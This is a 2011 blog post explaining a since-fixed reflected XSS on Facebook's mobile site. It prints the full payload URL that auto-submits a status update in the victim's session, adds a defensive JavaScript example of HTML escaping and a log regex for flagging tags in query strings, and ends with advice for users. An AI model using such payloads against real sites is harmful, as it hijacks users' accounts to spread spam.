Tuesday, March 29, 2011

New XSS at m.facebook.com

So, I noticed that there's a new XSS vulnerability found at Facebook by someone.
I figured it out after I saw my friend update his Facebook status in Indonesian.

So, what the attacker can do is this: when a victim clicks the link, the victim will automatically update his/her Facebook status via... Facebook's own app!!
You can see from the screenshot that the status was updated via Share.


So, how does the attacker make the victim update their status just by clicking the link?? The link below shows it: the value of the `user_xxxx_xxxx` parameter is reflected into the page without being escaped, so the injected script runs when the page loads, fills in the message field of the status form and submits it in the victim's own logged-in session:

http://m.facebook.com/path/blalallaa.php?display=wap&user_xxxx_xxxx='%3Cscript%3Ewindow.onload=function(){document.forms[0].message.value='Update Status!!!%20http://fakelink.cc/something';document.forms[0].submit();}%3C/script%3E
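To make the bug in that URL concrete, here is an added example (my own illustration, not code from the original post and not Facebook's code). It assumes a hypothetical page that echoes a `user_ref` query parameter into a hidden form field, and a made-up host `m.example.test`; the two request lines are constructed. It contrasts the unescaped rendering with an entity-encoded one, and includes a small log check that flags requests whose decoded query string carries an HTML tag, which is how a defender would spot this kind of link being passed around.

```javascript
// Added example (not from the original post): a reflected query parameter
// becomes script when dropped into HTML unescaped, and entity-encoding
// is the fix. Parameter name "user_ref" and host "m.example.test" are
// hypothetical, chosen for this illustration.

const ESCAPE_MAP = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Replace every character that has meaning in HTML with its entity.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ESCAPE_MAP[c]);
}

// Vulnerable rendering: the URL value lands in the page source verbatim,
// so a value that closes the attribute can open a <script> element.
function renderUnsafe(param) {
  return `<input type="hidden" name="user_ref" value="${param}">`;
}

// Hardened rendering: the same value, entity-encoded before interpolation.
function renderSafe(param) {
  return `<input type="hidden" name="user_ref" value="${escapeHtml(param)}">`;
}

// Count <script ...> elements a browser would actually parse out of markup.
function countScriptTags(html) {
  return (html.match(/<script\b/gi) || []).length;
}

// URL-decode the query string of a request (lone '%' would throw, so
// fall back to the raw string rather than crash the log scan).
function decodeQuery(url) {
  const q = url.indexOf("?");
  if (q < 0) return "";
  try {
    return decodeURIComponent(url.slice(q + 1));
  } catch {
    return url.slice(q + 1);
  }
}

// Detection rule for access logs: a decoded query string that contains
// an HTML tag opener is a typical sign of a reflected-XSS link.
function isSuspiciousRequest(url) {
  return /<\s*\/?\s*[a-z]/i.test(decodeQuery(url));
}

// Constructed sample requests: one normal, one carrying an injected script
// shaped like the one in the post (attribute break-out plus onload handler).
const SAMPLE_REQUESTS = [
  "http://m.example.test/page.php?display=wap&user_ref=abc123",
  "http://m.example.test/page.php?display=wap&user_ref='%3Cscript%3Ewindow.onload=function(){document.forms[0].submit();}%3C/script%3E",
];

function flaggedRequests(urls = SAMPLE_REQUESTS) {
  return urls.filter(isSuspiciousRequest);
}

// Constructed probe value for the rendering comparison.
const PROBE = "'><script>alert(document.domain)</script>";

console.log("unsafe :", renderUnsafe(PROBE));
console.log("safe   :", renderSafe(PROBE));
console.log("flagged:", flaggedRequests());
```

The point of `renderSafe` is that the browser never sees a `<` from user data, only `&lt;`, so there is no element for `window.onload` to hang on; the form the post describes is still there, but nothing on the page tells it to submit. The log rule is deliberately coarse (any decoded tag opener) because it is meant to surface links for a human to look at, not to block traffic.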

- If you want to click the link without updating your Facebook status, log out first :D (the script submits the status form in your logged-in session; with no session there is nothing to submit)
- Expand the shortened URL into the real URL first
- Still, never click it. An attacker could use a more dangerous script for a worse purpose.
- Just remove the status update before your friends click it. Please don't share it for fun; it can be dangerous for your Facebook account if the attacker wants it to be.

Edited:
- The Facebook team has already fixed this vuln.
- My friend also blogged about this, here.
Disclaimer: I'm not the one who found this vuln first. Kudos to the real finder.


Anonymous said...

nice post! =)